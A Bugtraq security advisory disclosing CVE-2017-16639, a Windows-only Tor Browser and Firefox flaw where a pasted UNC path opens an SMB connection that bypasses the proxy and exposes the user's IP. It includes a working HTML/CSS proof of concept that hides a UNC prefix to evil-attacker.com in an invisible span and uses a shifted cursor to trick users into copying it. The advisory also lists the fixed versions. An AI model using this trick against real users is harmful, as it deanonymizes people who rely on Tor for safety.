[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
CVE-2017-16639 - Tor Browser Deanonymization With SMB
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: CVE-2017-16639 - Tor Browser Deanonymization With SMB
- From: Filippo Cavallarin <filippo.cavallarin@xxxxxxxxxxxxxxxx>
- Date: Wed, 12 Sep 2018 14:18:59 +0200
Advisory ID: SGMA18-002
Title: Tor Browser Deanonymization With SMB
Product: Tor Browser < 8.0, Firefox < 62 / < 60.2.0esr
Vendor: torproject.org, mozilla.org
Type: Information Disclosure
Risk level: 4 / 5
Credits: filippo.cavallarin@xxxxxxxxxxxxxxxx
CVE: CVE-2017-16639
Vendor notification: 2017-11-02
Vendor fix: 2018-09-05
Public disclosure: 2018-09-12
Details
Tor Browser version < 8.0 and Firefox version < 62 / < 60.2.0esr are affected
by an information disclosure vulnerability that allows remote attackers to
bypass the intended anonymity feature and discover a client IP address. The
vulnerability affects Windows users only and needs user interaction to be
exploited.
It's a different vulnerability than CVE-2017-16541 (even if it's similar in the
concept and it comes from the same author).
The vulnerability exists because the browser(s) fails to block UNC paths to be
loaded in the address bar leading to a connection to an arbitrary SMB server.
The Universal Naming Convention (UNC) is the naming system used in Microsoft
Windows for accessing shared network folders and printers. By accessing a UNC
path it's possible to automatically mount a network share and access its
resources. For example "dir \\evil-attacker.com\share\file" will connect to
evil-attacker.com using SMB protocol and get access to shared file.
When a UNC path is typed or pasted into the address bar the operating system
will immediately try to connect to the specified server bypassing the
configured proxy and revealing the true identity of the user. Note that the
connection is triggered as soon as the UNC path is pasted into the address bar
(without the need to hit the return key).
PoC
To exploit this vulnerability an attacker needs to trick the victim into
pasting its malicious UNC path into the address bar of its browser and wait for
SMB packets on its server.
Of course it's not exactly easy to convince someone to paste untrusted text on
it's browser's address bar, but some css may help us. Consider the following
(valid) UNC path:
\\evil-attacker.com\share\http://trusted.site/
in an html page the path above can be written as
<span
style="font-size:1px;opacity:0">\\evil-attacker.com\share\</span>http://trusted.site/
so it's displayed as
http://trusted.site/
Doing so, instead of trick someone into pasting untrusted text, an attacker may
try to send its victims to a website he/she controls and convince them to
copy/paste a plausible URL.
At this point the attacker needs to be sure that the whole path is copied
including the small and invisible span at the beginning.
To do so he/she can use some css to change the mouse cursor to a "left-shifted"
one so that the mouse selection starts a few pixels before the displayed
cursor. To make this sort of fake cursor an attacker needs a tool like GIMP to
create a transparent image 20 pixels wide and put the image of the
text-selection cursor on its right side.
A working PoC will look like this:
<style>
*{
cursor: url(shifted-cursor.cur), auto ;
}
</style>
<p>Please copy/paste the url below in the addressbar:</p>
<p><span
style="font-size:1px;opacity:0">\\evil-attacker.com\share\</span>http://trusted.site/</p>
Solution
Update Tor Browser to version >= 8.0
Update Firefox to version >= 62.0 or >= 60.2.0esr
References
https://www.torproject.org/
https://www.wearesegment.com/research/tor-browser-deanonymization-with-smb/